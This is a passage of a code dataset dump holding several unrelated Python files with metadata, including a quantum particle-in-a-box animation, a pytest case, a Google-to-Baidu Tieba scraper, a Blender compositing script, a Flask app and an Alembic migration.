gx = np.exp(-0.5*((x-x0)/sig)**2)\r\n pw = np.exp(ci*k0*x)\r\n return pre*gx*pw\r\n\r\ndef FourierAnalysis(x, PsiX, n, L):\r\n cn = np.zeros(len(n),dtype=complex)\r\n dx = x[1]-x[0]\r\n for i in range (0,len(cn)):\r\n \r\n som = 0+0j\r\n psi_i = PIB_Func(x, n[i], L)\r\n\r\n for j in range (0, len(x)):\r\n som = som + psi_i[j]*PsiX[j]*dx\r\n\r\n cn[i] = som\r\n\r\n return cn\r\n\r\ndef PIB_En(n, L):\r\n En = (n*n * np.pi*np.pi)/(2*L*L)\r\n return En\r\n\r\ndef PIB_Time(n, L, t):\r\n E = PIB_En(n, L)\r\n ci = 0.+1j\r\n phi_n_t = np.exp(-1*ci*E*t)\r\n ### Write code here to define phi_n_t\r\n return phi_n_t\r\n\r\nL = 500.\r\nsig = 20.\r\nk0 = 0.5\r\nx0 = 200.\r\nN = 500\r\nx = np.linspace(0,L,5000)\r\nn = np.linspace(1, 100,100)\r\ny=PIB_Func(x,6,L)+PIB_Func(x,3,L)\r\nP = np.real(np.conj(y)*y)\r\ncn = FourierAnalysis(x, y, n, L)\r\n\r\npsi_exp = np.zeros(len(x))\r\nfor i in range (0,len(cn)):\r\n psi_exp = psi_exp + cn[i]*PIB_Func(x, i+1, L)\r\n\r\ndef init():\r\n line.set_data([], [])\r\n return line,\r\n\r\n# animation function. This is called sequentially to generate the animation\r\ndef animate(i):\r\n \r\n ### Once PIB_Func and PIB_En are defined, the following\r\n ### code can be used to plot the time-evolution of an energy eigenfunction\r\n\r\n ### Define x-grid - this will be for a particle in a box of length L=30 atomic units (Bohr radii)\r\n ### We will represent the function with 1000 grid points (dx = 30/1000)\r\n \r\n \r\n\r\n ### Imaginary unit i\r\n \r\n psi_t = np.zeros(len(x),dtype=complex)\r\n print(cn[2],cn[5]) \r\n print(PIB_Time(3,L,i),PIB_Time(6,L,i))\r\n for j in range(0,len(cn)):\r\n psi = PIB_Func(x, n[j], L,)\r\n ft = PIB_Time(n[j], L, i)\r\n psi_t = psi_t +cn[j]*psi*ft\r\n \r\n \r\n psi_t_star = np.conj(psi_t)\r\n\r\n y = np.real(psi_t)\r\n z = np.imag(psi_t)\r\n p = np.real(psi_t_star*psi_t)\r\n line.set_data(x, y)\r\n return line,\r\n\r\n\r\nanim = animation.FuncAnimation(fig, animate, init_func=init,\r\n frames=10000, interval=200, blit=True)\r\n### uncomment to save animation as mp4 \r\n#anim.save('pib_wp.mp4', fps=20, extra_args=['-vcodec', 'libx264'])\r\nplt.show()\r\n\r\n\r\n#lt.plot(x,np.real(psi_exp),'r--', x, np.real(y), 'blue')\r\n#lt.show()\r\n", "sub_path": "oldfiles/Code.4.23.2018.py", "file_name": "Code.4.23.2018.py", "file_ext": "py", "file_size_in_byte": 2714, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.conj", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.conj", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.imag", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}]} +{"seq_id": "146846071", "text": "import pytest\nfrom leetcode import sort_colours\n\n\n@pytest.mark.parametrize(\n 'nums,expected',\n [\n ([0, 1, 2, 1, 2], [0, 1, 1, 2, 2]),\n ([1, 2, 1], [1, 1, 2]),\n ([1], [1]),\n ],\n)\ndef test_sort_colours(nums, expected):\n assert sort_colours.sort_colours(nums) == expected\n", "sub_path": "tests/test_sort_colours.py", "file_name": "test_sort_colours.py", "file_ext": "py", "file_size_in_byte": 302, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "leetcode.sort_colours.sort_colours", "line_number": 14, "usage_type": "call"}, {"api_name": "leetcode.sort_colours", "line_number": 14, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 5, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "399347620", "text": "\"\"\"API Database Resources\"\"\"\n\n\nimport logging\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\nfrom api.config import Config\nfrom api.logger import time_function\n\nengine = create_engine(Config.DB['URI'], pool_size=10, max_overflow=20)\nSession = sessionmaker(bind=engine)\nbase = declarative_base(bind=engine)\n\nstoreSession = Session()\nlastSession = Session()\nallSession = Session()\n\n@time_function\ndef to_database(obj):\n \"\"\"Store the object into the database\n \n Arguments:\n obj {Declarative_Base} -- SqlAlchemy Base ORM object to be stored\n \n Returns:\n Declarative_base -- ORM Object stored in database\n \"\"\"\n try:\n storeSession.add(obj)\n storeSession.commit()\n logging.debug('Stored to database')\n return obj\n except Exception as _x:\n storeSession.rollback()\n logging.exception('Database storage session error: %s', (_x))\n storeSession.close()\n \n", "sub_path": "api/database.py", "file_name": "database.py", "file_ext": "py", "file_size_in_byte": 1041, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 13, "usage_type": "call"}, {"api_name": "api.config.Config.DB", "line_number": 13, "usage_type": "attribute"}, {"api_name": "api.config.Config", "line_number": 13, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 38, "usage_type": "call"}, {"api_name": "api.logger.time_function", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "229571911", "text": "from urllib.parse import urlencode\r\nfrom html.parser import HTMLParser\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom HtmlFactory import HtmlFactory\r\nimport urllib.request\r\nimport urllib.parse\r\nimport http.cookiejar, threading\r\nimport random, sys, datetime, time, os\r\nimport time\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nclass CatchHtml():\r\n def __init__(self, obj):\r\n self.GUI = obj\r\n self.lastPage = 0\r\n self.htmlFactory = HtmlFactory()\r\n self.non_bmp_map = dict.fromkeys(range(0x10000, sys.maxunicode + 1), 0xfffd)\r\n self.numOfCatch = 0\r\n self.numthd = 0\r\n self.thdList = []\r\n self.tLock = threading.Lock()\r\n date = datetime.datetime.now()\r\n filename = '%s_%s_%s.log' % (date.year, date.month, date.day)\r\n if os.path.exists(filename):\r\n os.remove(filename)\r\n self.logFile = open('%s_%s_%s.log' % (date.year, date.month, date.day),\"a+\",encoding='UTF-8')\r\n \r\n def catchContent(self, url):\r\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\r\n date = datetime.datetime.now()\r\n txtFile=open('%s_%s_%s_%s.csv' % (date.year, date.month, date.day, self.keyword),\"a+\",encoding='UTF-8')\r\n if self.numOfCatch == 0:\r\n print( '\\uFEFF', file=txtFile, end='' )\r\n print( 'Date,Title,Author,Content,Comments', file=txtFile )\r\n print( '開始save to csv' )\r\n\r\n request = urllib.request.Request(url ,headers=headers)\r\n print('sss1')\r\n html = urllib.request.urlopen(request)\r\n print('sss2')\r\n txtHtml = html.read().decode('utf8', errors='ignore').translate(self.non_bmp_map)\r\n html.close()\r\n print('sss3')\r\n Date = self.htmlFactory.getDate(txtHtml) \r\n if Date == '':\r\n html.close()\r\n return False\r\n result = self.htmlFactory.getDate(txtHtml) + ',' + self.htmlFactory.getTitle(txtHtml) + ',' + self.htmlFactory.getAuthor(txtHtml) + ',' + self.htmlFactory.getContent(txtHtml) + ',' + self.htmlFactory.getComment(txtHtml)\r\n print( 'result = content' )\r\n \r\n print( 'output result' )\r\n print( result, file=txtFile )\r\n #print( '------------------------------------------------------------------------------', file=txtFile )\r\n \r\n #html.close()\r\n\r\n \r\n self.tLock.acquire()\r\n self.numOfCatch = self.numOfCatch + 1\r\n self.tLock.release()\r\n return True\r\n def catchAllContents(self, urls):\r\n \r\n for url in urls:\r\n print(url)\r\n self.catchContent(url)\r\n #time.sleep (5)\r\n #thd = threading.Thread(target = self.catchContent, name='Catch%s' % self.numthd, args=(url,))\r\n #self.thdList.append( thd )\r\n #thd.start()\r\n #self.numthd = self.numthd + 1\r\n \r\n def catch(self, keyword, index, times = 0):\r\n try:\r\n strI = index/10 if index > 0 else 1\r\n self.GUI.showStatus.setText('正在抓取第%d頁' % strI)\r\n print('正在抓取第%d頁' % strI )\r\n headers = { \r\n #'Connection': 'Keep-Alive', \r\n #'Accept-Language': 'zh-TW,zh;en-US;q=0.6,en;q=0.4', \r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n #'Host' : 'tieba.baidu.com',\r\n #'Content-Type': 'text/html; charset=GBK',\r\n #'Upgrade-Insecure-Requests': '1',\r\n \r\n }\r\n \r\n\r\n url = 'https://www.google.com.tw/search?start=' + str(index) + '&q=' + urllib.parse.quote(keyword.encode('utf8')) + '+site%3Ahttps%3A%2F%2Ftieba.baidu.com%2F'\r\n ############# find last page\r\n \r\n\r\n #######################\r\n print('begin open' )\r\n print( url )\r\n\r\n request = urllib.request.Request(url, headers=headers)\r\n response = urllib.request.urlopen(request)\r\n print('end open' ) \r\n content = response.read().decode('GBK', errors='ignore').translate(self.non_bmp_map)\r\n response.close()\r\n #print(content)\r\n #print( '---->getUrls' )\r\n urls = self.htmlFactory.getUrls(content)\r\n #print( urls[0] )\r\n print( '---->end getUrls num: %d' % len(urls) )\r\n \r\n \r\n \r\n #print(content, file=open('111.html',\"a+\",encoding='GBK'))\r\n # 抓取內容\r\n #print( '---->catchContent' )\r\n if len(urls) <= 0 or times > 5:\r\n return False\r\n self.catchAllContents(urls)\r\n #print( '---->end catchContent' )\r\n except Exception as e:\r\n print('catch 發生Error: ' + str(e))\r\n print('catch 發生Error', file=self.logFile)\r\n self.GUI.textEdit.append('catch發生Error')\r\n print('重新開始至抓取' + str(index))\r\n self.catch(keyword, index, times=times+1)\r\n return True\r\n print('輸出成功至')\r\n return True\r\n def forCatching(self, keyword, beginI, endI ):\r\n stopIndex = endI\r\n sum_index = 1;\r\n i = self.lastPage = beginI\r\n while i <= endI:\r\n if not self.catch(keyword, i):\r\n stopIndex = i\r\n break;\r\n sum_index = sum_index + 1;\r\n if self.lastPage == -1:\r\n break \r\n print('Catch success')\r\n i = i + 10\r\n # Wait for all threads to terminate. \r\n for t in self.thdList:\r\n t.join()\r\n #print( 'after sleep %d' % len(self.thdList) )\r\n \r\n self.GUI.showStatus.setText('結束 第%d頁, 共抓%d筆資料' % (stopIndex, self.numOfCatch))\r\n self.numOfCatch = 0\r\n self.numthd = 0\r\n self.GUI.GoButton.setEnabled(True)\r\n self.logFile.close()\r\n def start(self, keyword, beginI, endI):\r\n self.keyword = keyword\r\n thd = threading.Thread(target = self.forCatching, name='Catching', args=(keyword,beginI-1,endI*10))\r\n thd.start()\r\n #self.catch(keyword, beginI)\r\n", "sub_path": "BIDOo/CatchHtml.py", "file_name": "CatchHtml.py", "file_ext": "py", "file_size_in_byte": 6332, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "HtmlFactory.HtmlFactory", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.maxunicode", "line_number": 18, "usage_type": "attribute"}, {"api_name": "threading.Lock", "line_number": 22, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 23, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "urllib.parse.request.Request", "line_number": 38, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 38, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 38, "usage_type": "name"}, {"api_name": "html.parser", "line_number": 40, "usage_type": "name"}, {"api_name": "urllib.parse.request.urlopen", "line_number": 40, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 40, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 40, "usage_type": "name"}, {"api_name": "html.parser.read", "line_number": 42, "usage_type": "call"}, {"api_name": "html.parser", "line_number": 42, "usage_type": "name"}, {"api_name": "html.parser.close", "line_number": 43, "usage_type": "call"}, {"api_name": "html.parser", "line_number": 43, "usage_type": "name"}, {"api_name": "html.parser.close", "line_number": 47, "usage_type": "call"}, {"api_name": "html.parser", "line_number": 47, "usage_type": "name"}, {"api_name": "urllib.parse.parse.quote", "line_number": 90, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 90, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 90, "usage_type": "name"}, {"api_name": "urllib.parse.request.Request", "line_number": 98, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 98, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 98, "usage_type": "name"}, {"api_name": "urllib.parse.request.urlopen", "line_number": 99, "usage_type": "call"}, {"api_name": "urllib.parse.request", "line_number": 99, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 99, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 152, "usage_type": "call"}]} +{"seq_id": "601552592", "text": "#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n'''BlendNet Script Compose\n\nDescription: Special script used by the Manager to compose result\n'''\n\nimport signal # The other better ways are not working for subprocess...\nsignal.signal(signal.SIGTERM, lambda s, f: print('WARN: Dodged TERM subprocess'))\n\nimport os, sys, json\nsys.path.append(os.path.dirname(__file__))\n\nimport disable_buffering\nimport blend_file\n\n# Read current task specification from json file\ntask = None\nwith open(sys.argv[-1], 'r') as f:\n task = json.load(f)\n\nexitcode = 0\n\nimport bpy\n\nprint(\"INFO: Preparing composing of:\", bpy.data.filepath)\n\nscene = bpy.context.scene\n\n# Set frame if provided\nif 'frame' in task:\n scene.frame_current = task['frame']\n\nprint('INFO: Checking existance of the dependencies')\ngoods, bads = blend_file.getDependencies(task.get('project_path'), task.get('cwd_path'), True)\nprint('DEBUG: Goods:', goods)\nprint('DEBUG: Bads:', bads)\n\nif scene.render.is_movie_format:\n print('WARN: Unable to save still image to movie format, so use single-layer exr for compose')\n exitcode = 1\n scene.render.image_settings.file_format = 'OPEN_EXR'\n scene.render.image_settings.color_mode = 'RGBA'\n scene.render.image_settings.color_depth = '32'\n scene.render.image_settings.exr_codec = 'ZIP'\n\n# Set the output file\nfilename = bpy.path.basename(scene.render.frame_path())\nscene.render.filepath = os.path.abspath(os.path.join(task.get('result_dir'), filename))\nos.makedirs(bpy.path.abspath(task.get('result_dir')), mode=0o750, exist_ok=True)\n\nimage_path = os.path.abspath(bpy.path.abspath(task.get('render_file_path')))\nprint('DEBUG: Using render image:', image_path)\nbpy.ops.image.open(filepath=image_path, use_sequence_detection=False)\nimage = bpy.data.images[bpy.path.basename(task.get('render_file_path'))]\n\n# If compositing is disabled - just convert the file to the required format\nif not task.get('use_compositing_nodes'):\n print('DEBUG: Compositing is disabled, just converting the render image')\n if scene.render.image_settings.file_format == 'OPEN_EXR_MULTILAYER':\n print('WARN: Just move the render to compose due to blender bug T71087')\n # Windows will not just replace the file - so need to check if it's exist\n try:\n if os.path.exists(bpy.path.abspath(scene.render.frame_path())):\n os.remove(bpy.path.abspath(scene.render.frame_path()))\n os.rename(image_path, bpy.path.abspath(scene.render.frame_path()))\n except Exception as e:\n # Could happen on Windows if file is used by some process\n print('ERROR: Unable to move file:', str(e))\n sys.exit(1)\n\n # Save the loaded image as render to convert\n image.save_render(bpy.path.abspath(scene.render.frame_path()))\n\n# Enable compose to replace the regular render layers node with prerendered EXR image\nscene.render.use_compositing = True\nscene.render.use_sequencer = False\nscene.use_nodes = True\n\nimage_node = scene.node_tree.nodes.new(type='CompositorNodeImage')\nimage_node.image = image\n\nlink_name_overrides = {}\nif image_node.image.type == 'MULTILAYER':\n try:\n image_node.layer = 'View Layer'\n except:\n # In Blender v3 the naming was changed\n image_node.layer = 'ViewLayer'\n link_name_overrides['Image'] = 'Combined'\n\nnodes_to_remove = []\nlinks_to_create = []\n# Find nodes, links and outpus\nfor node in scene.node_tree.nodes:\n print('DEBUG: Checking node %s' % (node,))\n if not isinstance(node, bpy.types.CompositorNodeRLayers) or node.scene != scene:\n continue\n nodes_to_remove.append(node)\n print('INFO: Reconnecting %s links to render image' % (node,))\n for link in scene.node_tree.links:\n print('DEBUG: Checking link %s - %s' % (link.from_node, link.to_node))\n if link.from_node != node:\n continue\n print('DEBUG: Found link %s - %s' % (link.from_socket, link.to_socket))\n link_name = link_name_overrides.get(link.from_socket.name, link.from_socket.name)\n for output in image_node.outputs:\n print('DEBUG: Checking output:', output.name, link_name)\n if output.name != link_name:\n continue\n links_to_create.append((output, link))\n break\n\n# Relinking previous render layer node outputs to the rendered image\nfor output, link in links_to_create:\n print('INFO: Connecting \"%s\" output to %s.%s input' % (\n output, link.to_node, link.to_socket\n ))\n scene.node_tree.links.new(output, link.to_socket)\n\n# Removing the nodes could potentially break the pipeline\nfor node in nodes_to_remove:\n print('INFO: Removing %s' % (node,))\n scene.node_tree.nodes.remove(node)\n\nbpy.ops.render.render(write_still=True)\n\nprint('INFO: Compositing completed')\nsys.exit(exitcode)\n", "sub_path": "BlendNet/script-compose.py", "file_name": "script-compose.py", "file_ext": "py", "file_size_in_byte": 4801, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "signal.signal", "line_number": 9, "usage_type": "call"}, {"api_name": "signal.SIGTERM", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "bpy.data", "line_number": 26, "usage_type": "attribute"}, {"api_name": "bpy.context", "line_number": 28, "usage_type": "attribute"}, {"api_name": "blend_file.getDependencies", "line_number": 35, "usage_type": "call"}, {"api_name": "bpy.path.basename", "line_number": 48, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 50, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 50, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bpy.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bpy.ops.image.open", "line_number": 54, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 54, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 55, "usage_type": "attribute"}, {"api_name": "bpy.path.basename", "line_number": 55, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "bpy.path.abspath", "line_number": 64, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 65, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 65, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 66, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 70, "usage_type": "call"}, {"api_name": "bpy.path.abspath", "line_number": 73, "usage_type": "call"}, {"api_name": "bpy.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "bpy.types", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bpy.ops.render.render", "line_number": 126, "usage_type": "call"}, {"api_name": "bpy.ops", "line_number": 126, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "213067875", "text": "import json\n\n\nprefix_file = open(\"Script/Modifiable_variables/prefix.json\", \"r\")\nprefix = json.load(prefix_file)\nprefix_file.close()\nPrefix = {}\nfor guild_id, bot_prefix in prefix.items():\n Prefix[int(guild_id)] = bot_prefix\n\nvotes_file = open(\"Script/Modifiable_variables/votes.json\", \"r\")\nvotes = json.load(votes_file)\nvotes_file.close()\nVotes = {}\nfor member_id, points in votes.items():\n Votes[int(member_id)] = points\n\nsupport_file = open(\"Script/Modifiable_variables/support_role_ for_tickets.json\", \"r\")\nsupport = json.load(support_file)\nsupport_file.close()\nSupport = {}\nfor guild_id, support_id in support.items():\n Support[int(guild_id)] = support_id\n", "sub_path": "Script/Modifiable_variables/import_var.py", "file_name": "import_var.py", "file_ext": "py", "file_size_in_byte": 670, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.load", "line_number": 5, "usage_type": "call"}, {"api_name": "json.load", "line_number": 12, "usage_type": "call"}, {"api_name": "json.load", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "105666759", "text": "#!/usr/bin/python\n\nfrom flask import Flask, render_template, request\nfrom simulation import Universe\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n if request.method == 'GET':\n return render_template('start.html')\n return render_template('results.html', log=simulate(request.form))\n\ndef simulate(params):\n universe = Universe(int(params['population']) or 100, int(params['locations']) or 10)\n universe.run(10)\n return universe.log\n\nif __name__ == \"__main__\":\n app.run()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "flask.Flask", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 10, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 10, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 12, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 12, "usage_type": "name"}, {"api_name": "simulation.Universe", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "241112434", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: c:\\users\\jonat\\code\\snek_cogs\\tarot\\cogs\\tarot\\t_data\\json_data.py\n# Compiled at: 2020-01-06 10:13:36\n# Size of source mod 2**32: 373 bytes\nimport json, os\nDIR_PATH = os.path.dirname(os.path.realpath(__file__))\nwith open(DIR_PATH + '/tarot_spreads.json') as (f):\n tarot_spreads = json.load(f)\nwith open(DIR_PATH + '/tarot_data.json') as (f):\n tarot_data = json.load(f)\nwith open(DIR_PATH + '/tarot_skins.json') as (f):\n tarot_skins = json.load(f)", "sub_path": "pycfiles/d_snek_cogs_tarot-0.1.1-py3-none-any/json_data.cpython-38.py", "file_name": "json_data.cpython-38.py", "file_ext": "py", "file_size_in_byte": 613, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 9, "usage_type": "call"}, {"api_name": "json.load", "line_number": 11, "usage_type": "call"}, {"api_name": "json.load", "line_number": 13, "usage_type": "call"}, {"api_name": "json.load", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "58852985", "text": "\"\"\"empty message\n\nRevision ID: 5261344d5bfb\nRevises: 40580ec50dd5\nCreate Date: 2014-09-05 12:08:43.139721\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '5261344d5bfb'\ndown_revision = '40580ec50dd5'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('age', sa.Integer(), nullable=True))\n op.add_column('users', sa.Column('name', sa.String(length=255), nullable=True))\n op.add_column('users', sa.Column('study', sa.String(length=255), nullable=True))\n op.add_column('users', sa.Column('twitter_handle', sa.String(length=255), nullable=True))\n op.add_column('users', sa.Column('work', sa.String(length=255), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('users', 'work')\n op.drop_column('users', 'twitter_handle')\n op.drop_column('users', 'study')\n op.drop_column('users', 'name')\n op.drop_column('users', 'age')\n ### end Alembic commands ###\n", "sub_path": "migrations/versions/5261344d5bfb_.py", "file_name": "5261344d5bfb_.py", "file_ext": "py", "file_size_in_byte": 1099, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "alembic.op.add_column", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 19, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 20, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 20, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op.drop_column", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 33, 